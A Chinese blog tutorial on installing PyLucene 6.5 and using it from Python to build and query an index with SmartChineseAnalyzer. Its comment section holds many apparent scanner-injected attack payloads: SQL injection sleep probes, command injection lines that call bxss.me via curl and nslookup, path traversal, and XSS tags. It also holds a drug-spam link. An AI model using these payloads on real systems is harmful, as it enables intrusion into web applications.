pylucene的安装与使用

2020-12-19 09:17:01 编辑          阅读量:3353

  Lucene是apache软件基金会4jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具包,即它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构,提供了完整的查询引擎和索引引擎,部分文本分析引擎(英文与德文两种西方语言)。
  Lucene的目的是为软件开发人员提供一个简单易用的工具包,以方便的在目标系统中实现全文检索的功能,或者是以此为基础建立起完整的全文检索引擎。它是一个索引与搜索类库,而不是完整的程序,可以建立包含词语位置信息的索引。
  使用Lucene的方式主要有二种:一是自己编写程序,调用类库;二是使用第三方基于Lucene编写的程序,如Solr等。 
  许多搜索引擎都有参考lucene的实现,python下的搜索工具whoosh也是参考lucence。pylucene是python版的lucene,使用jcc“编译”。安装、使用步骤如下:

安装

  1. pylucene需要java环境,所以要先装java,然后设置好JAVA_HOME
  2. 下载pylucene 6.5,解压
  3. 进入pylucene-6-5目录,然后执行
    1. $ pushd jcc
    2. <edit setup.py to match your environment> # 主要看java的目录是否正确
    3. $ python setup.py build
    4. $ sudo python setup.py install
    5. $ popd
    6. <edit Makefile to match your environment> # 修改的内容详见目录
    7. $ make
    8. $ make test (look for failures)
    9. $ sudo make install
  4. 验证是否安装成功,能在python中 import lucene即表明成功安装

使用

使用时可以参考官网API,以及参考java版的API, pylucene的格式与lucene很相似

  1. #!/usr/bin/env python
  2. # coding: utf-8
  3. import time
  4. import os
  5. import logging
  6. import shutil
  7. import lucene
  8. from org.apache.lucene.analysis.cn.smart import SmartChineseAnalyzer
  9. from org.apache.lucene.document import Document, Field, FieldType
  10. from org.apache.lucene.index import DirectoryReader, PostingsEnum,\
  11. SlowCompositeReaderWrapper, IndexWriter, IndexWriterConfig,\
  12. IndexOptions, MultiFields
  13. from org.apache.lucene.queryparser.classic import QueryParser
  14. from org.apache.lucene.search import DocIdSetIterator, IndexSearcher,\
  15. ScoreDoc, TopDocs
  16. from org.apache.lucene.store import FSDirectory
  17. from org.apache.lucene.util import BytesRef, BytesRefIterator
  18. from java.nio.file import Paths
  19. from flask import current_app as app
  20. from service import tabledef
  21. BASE_PATH = os.path.dirname(os.path.abspath(__file__))
  22. INDEX_DIR = os.path.join(BASE_PATH, tabledef.IndexSettings.path)
  23. logger = logging.getLogger(tabledef.IndexSettings.logger_name)
  24. def separateQuery(query):
  25. '''separate query with SmartChineseAnalyzer
  26. Args:
  27. query: str
  28. Return:
  29. word_list: list
  30. '''
  31. docContentField = ''
  32. parser = QueryParser(docContentField, SmartChineseAnalyzer())
  33. query = parser.parse(query)
  34. word_list = query.toString().split(' ')
  35. return word_list
  36. def getQueryPositionsAndFreqs(query, field, reader):
  37. '''return query position in document
  38. Args:
  39. query: unicode
  40. field: unicode, the field in index
  41. reader: FSDirectory.open(index_dir)
  42. Return:
  43. dict: {word: {document_id: [position(int) list]}}
  44. dict: {word_order: [docid which has this word]}
  45. list: docid list
  46. '''
  47. positons = {}
  48. freqs = {}
  49. doc_list = set()
  50. words = separateQuery(query)
  51. logger.debug('open index: %s', reader)
  52. atomic_reader = SlowCompositeReaderWrapper.wrap(reader)
  53. field_reader = atomic_reader.terms(field)
  54. if field_reader is None:
  55. raise KeyError("Cann't find the field: %s" % field)
  56. terms_enum = field_reader.iterator()
  57. for word_order, word in enumerate(words):
  58. # 每个词查询时都要清空上一次的搜索结果
  59. search_positons = {}
  60. id_freq = {}
  61. logger.debug('search word: %s', word)
  62. if_found = terms_enum.seekExact(BytesRef(word))
  63. # 必须判断,因为如果索引中没有这个词,它会从索引中取出另外的词,很容易引起没有该词结果有结果的问题http://lucene.apache.org/core/6_5_0/core/index.html![](http://cblog.xyz/media/2017/09/QQ截图20170913152354.png)
  64. if not if_found:
  65. freqs[word_order] = {}
  66. continue
  67. docs = terms_enum.postings(None, PostingsEnum.POSITIONS)
  68. if not docs:
  69. freqs[word_order] = {}
  70. continue
  71. docid = docs.nextDoc()
  72. while docid != DocIdSetIterator.NO_MORE_DOCS:
  73. doc_list.add(docid)
  74. position_list = []
  75. freq = docs.freq()
  76. id_freq[docid] = freq
  77. for i in range(freq):
  78. position_list.append(docs.nextPosition())
  79. search_positons[docid] = position_list
  80. docid = docs.nextDoc()
  81. freqs[word_order] = id_freq
  82. positons[word] = search_positons
  83. return positons, freqs, list(doc_list)
  84. def getDocStats(field, reader):
  85. '''return doc status in index
  86. Args:
  87. query: unicode
  88. reader: FSDirectory.open(index_dir)
  89. Return:
  90. doc_num: int
  91. avg_doc_length: float
  92. doc_lem_map: dict, {docid: doc_len}
  93. '''
  94. total_dl = 0
  95. doc_length_map = {}
  96. doc_num = reader.numDocs()
  97. for docid in range(doc_num):
  98. doc_len = 0
  99. term_num = 0
  100. terms = reader.getTermVector(docid, field)
  101. if terms and terms.size() > 0:
  102. terms_enum = terms.iterator()
  103. for term in BytesRefIterator.cast_(terms_enum):
  104. freq = terms_enum.totalTermFreq()
  105. doc_len += freq
  106. term_num += 1
  107. total_dl += doc_len
  108. doc_length_map[docid] = doc_len
  109. avg_doc_length = total_dl * 1.0 / doc_num
  110. return doc_num, doc_length_map, avg_doc_length
  111. def getTermStats(field, reader):
  112. '''Find all terms of field in reader
  113. Args:
  114. field: str, search filed
  115. reader: FSDirectory.open(index_dir)
  116. Return:
  117. dict: {term(str): frequence(int), ...}
  118. Raise:
  119. KeyError: when the field can be found in index'''
  120. result = {}
  121. fields = MultiFields.getFields(reader)
  122. terms = fields.terms(field)
  123. if not terms:
  124. raise KeyError("Cann't find the field: %s" % field)
  125. iterator = terms.iterator()
  126. for term in BytesRefIterator.cast_(iterator):
  127. term_name = term.utf8ToString()
  128. doc_freq = iterator.docFreq()
  129. result[term_name] = doc_freq
  130. return result
  131. def getIndexPath(index_dir):
  132. """根据index_dir生成目录名
  133. """
  134. if index_dir:
  135. index_dir = os.path.join(
  136. INDEX_DIR, tabledef.IndexSettings.sub_path + index_dir)
  137. else:
  138. index_dir = INDEX_DIR
  139. return index_dir
  140. class CrterIndex(object):
  141. def __init__(self):
  142. if app.cache.has_key('vm'):
  143. # app.java_vm['vm'].attachCurrentThread()
  144. logger.debug('javaVM exists: %s', app.cache['vm'])
  145. else:
  146. vm = lucene.initVM()
  147. app.cache['vm'] = vm
  148. logger.debug('init javaVM: %s', vm)
  149. def createIndex(self, data, index_dir=None):
  150. '''create index
  151. Args:
  152. data: [{key: data},{}...{}], dict list, and the key will be field
  153. index_dir: str, index path, default is INDEX_DIR
  154. Return:
  155. True if create index success
  156. '''
  157. index_dir = getIndexPath(index_dir)
  158. logger.debug('create index: %s', index_dir)
  159. index = FSDirectory.open(Paths.get(index_dir))
  160. analyzer = SmartChineseAnalyzer()
  161. config = IndexWriterConfig(analyzer)
  162. config.setOpenMode(IndexWriterConfig.OpenMode.CREATE)
  163. writer = IndexWriter(index, config)
  164. ft = FieldType()
  165. ft.setStored(True)
  166. ft.setTokenized(True)
  167. ft.setStoreTermVectors(True)
  168. ft.setStoreTermVectorOffsets(True)
  169. ft.setStoreTermVectorPositions(True)
  170. ft.setIndexOptions(IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)
  171. for dict_data in data:
  172. doc = Document()
  173. # logger.debug('add field: %s', dict_data)
  174. for key in dict_data:
  175. # logger.debug('field data:%s', key)
  176. doc.add(Field(key, unicode(dict_data[key]), ft))
  177. writer.addDocument(doc)
  178. writer.commit()
  179. writer.close()
  180. index.close()
  181. def removeIndex(self, index_dir=None):
  182. """Remove index catalog
  183. Args:
  184. index_dir: str, default is None, which means INDEX_DIR
  185. Return:
  186. None"""
  187. index_dir = getIndexPath(index_dir)
  188. try:
  189. shutil.rmtree(index_dir)
  190. os.mkdir(index_dir)
  191. logger.debug('remove all files in index: %s', index_dir)
  192. except Exception, e:
  193. logger.warn(e)
  194. if __name__ == '__main__':
  195. lucene.initVM(vmargs=['-Djava.awt.headless=true'])
  196. print 'lucene', lucene.VERSION
  197. # data = [{"id": "592e42958fb0fe10a2816719", "question": "劳动者解除劳动合同的经济补偿金", "answer": "劳动者自身原因离职的除非用人单位同意支付经济补偿金,否则在这种情况下法律并没有规定劳动者主动解除劳动合同也应获经济补偿金"},
  198. # {"id": "592e42958fb0fe10a281671a", "question": "劳动者被迫解除劳动合同", "answer": "被迫解除是因为用人单位有法定情形损害劳动者权益时,劳动者被迫提出的解除劳动合同;"},
  199. # { "id": "592e42958fb0fe10a281671b", "question": "劳动者主动解除劳动合同", "answer": "主动解除是指劳动者由于个人原因选择离开"}]
  200. # createIndex(data)
  201. index = FSDirectory.open(Paths.get(INDEX_DIR))
  202. reader = DirectoryReader.open(index)
  203. result = getQueryPositionsAndFreqs('刑法', 'question', reader)
  204. logger.debug('getQueryPositions: %s', result)
  205. result = getTermStats('question', reader)
  206. logger.debug('getTermStats: %s', result)
  207. result = getDocStats('question', reader)
  208. logger.debug('getDocStats: %s', result)
  209. index.close()
  210. reader.close()

附录

MakeFile修改的内容

根据系统版本修改,比如:

  1. 76 # Linux (Debian Jessie 64-bit, Python 2.7.9, Oracle Java 1.8
  2. 77 # Be sure to also set JDK['linux2'] in jcc's setup.py to the JAVA_HOME value
  3. 78 # used below for ANT (and rebuild jcc after changing it).
  4. 79 PREFIX_PYTHON=/usr # centos下验证生效,结合第81行
  5. 80 ANT=JAVA_HOME=/usr/lib/jvm/java-8-oracle /usr/bin/ant # 根据JAVA_HOME修改
  6. 81 PYTHON=$(PREFIX_PYTHON)/bin/python
  7. 82 JCC=$(PYTHON) -m jcc --shared # 如果要多线程共用java虚拟机,则--shared不能删除
  8. 83 NUM_FILES=8
  9. # 如果需要使用SmartChineseAnalyzer分词,则需要做
  10. 137 #JARS+=$(SMARTCN_JAR) # smart chinese analyzer,需要取消此行注释
  11. 318 --exclude org.apache.lucene.sandbox.queries.regex.JakartaRegexpCapabilities \ #原文件有的内容
  12. 319 --exclude org.apache.lucene.analysis.cn.smart.AnalyzerProfile\ # 需要添加的内容

验证是否成功添加:

  1. $ python
  2. import lucene
  3. from org.apache.lucene.analysis.cn.smart import SmartChineseAnalyzer # 能导入说明成功添加

参考:

附件:

pylucene-6.5.0-src.tar.gz

评论详情

共45条评论


高高的黑米
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

温柔的人生
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

无辜的夏天
555ZFjZMHCZ') OR 171=(SELECT 171 FROM PG_SLEEP(15))--

安静的万宝路
555-1) OR 836=(SELECT 836 FROM PG_SLEEP(15))--

开朗的百褶裙
&(nslookup${IFS}-q${IFS}cname${IFS}hitrmhkkbhuthaf4ee.bxss.me||curl${IFS}hitrmhkkbhuthaf4ee.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrmhkkbhuthaf4ee.bxss.me||curl${IFS}hitrmhkkbhuthaf4ee.bxss.me)&`'

敏感的画板
${@print(md5(31337))}\

昏睡的黄豆
../../../../../../../../../../../../../../windows/win.ini

坚定的小猫咪
"

眼睛大的纸飞机
file:///etc/passwd

斯文的面包
555

谨慎的裙子
${@print(md5(31337))}

勤劳的寒风
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

传统的白云
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

欣喜的蜜蜂
'"()&%<zzz><ScRiPt >EzDx(9936)</ScRiPt>

淡然的乌冬面
&(nslookup -q=cname hitseomutnltr5169c.bxss.me||curl hitseomutnltr5169c.bxss.me)&'\"`0&(nslookup -q=cname hitseomutnltr5169c.bxss.me||curl hitseomutnltr5169c.bxss.me)&`'

醉熏的曲奇
$(nslookup -q=cname hitdlhdzrsenl71d4b.bxss.me||curl hitdlhdzrsenl71d4b.bxss.me)

洁净的帽子
bxss.me/t/xss.html?%00

自由的芝麻
http://bxss.me/t/fit.txt?.jpg

老实的手链
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

顺利的玫瑰
comment/.

兴奋的小丸子
https://vn.cblog.xyz/

朴实的香菇
555|echo kycysy$()\ yhstfu\nz^xyu||a #' |echo kycysy$()\ yhstfu\nz^xyu||a #|" |echo kycysy$()\ yhstfu\nz^xyu||a #

爱听歌的发带
'"()

清脆的雪糕
Http://bxss.me/t/fit.txt

满意的季节
comment

怕黑的衬衫
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg

沉默的秀发
'A'.concat(70-3).concat(22*4).concat(107).concat(85).concat(122).concat(81)+(require'socket' Socket.gethostbyname('hitdo'+'uyyobxqraff6d.bxss.me.')[3].to_s)

飘逸的中心
555

时尚的溪流
^(#$!@#$)(()))******

忧郁的水杯
HttP://bxss.me/t/xss.html?%00

谨慎的香烟
555*if(now()=sysdate(),sleep(15),0)

迷你的大炮
!(()&&!|*|*|

体贴的蜡烛
555&n908554=v943927

孤独的春天
)

大气的灰狼
|echo yrakeu$()\ vdsdih\nz^xyu||a #' |echo yrakeu$()\ vdsdih\nz^xyu||a #|" |echo yrakeu$()\ vdsdih\nz^xyu||a #

爱笑的萝莉
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

激动的小馒头
ix6TpmGM

昏睡的咖啡豆
&echo dnppfl$()\ iccnuz\nz^xyu||a #' &echo dnppfl$()\ iccnuz\nz^xyu||a #|" &echo dnppfl$()\ iccnuz\nz^xyu||a #

可靠的小熊猫
echo jcxlea$()\ kylwyp\nz^xyu||a #' &echo jcxlea$()\ kylwyp\nz^xyu||a #|" &echo jcxlea$()\ kylwyp\nz^xyu||a #

勤恳的荔枝
'+response.write(9837545*9420476)+'

无辜的蜡烛
1gDVCK8YO

辛勤的老虎
response.write(9837545*9420476)

寒冷的星星
555

从容的钢笔
generic lipitor <a href="https://lipiws.top/">order lipitor 20mg generic</a> buy lipitor 10mg pill

匿名用户
Traceback (most recent call last): File "test.py", line 11, in <module> from org.apache.lucene.index import DirectoryReader, PostingsEnum,\ ImportError: cannot import name 'SlowCompositeReaderWrapper' 您好,还有这样类似的问题,请问是怎么解决的呢,求建议!

最近访客

108.*.*.251[] 2025-04-02 22:00:45

172.*.*.118[XX] 2025-04-02 04:39:18

213.*.*.208[0] 2025-04-02 03:25:30

172.*.*.216[0] 2025-04-01 20:25:23

162.*.*.141[0] 2025-04-01 20:12:25

Copyright © 2006-2021 .All Rights Reserved
粤ICP备16122044号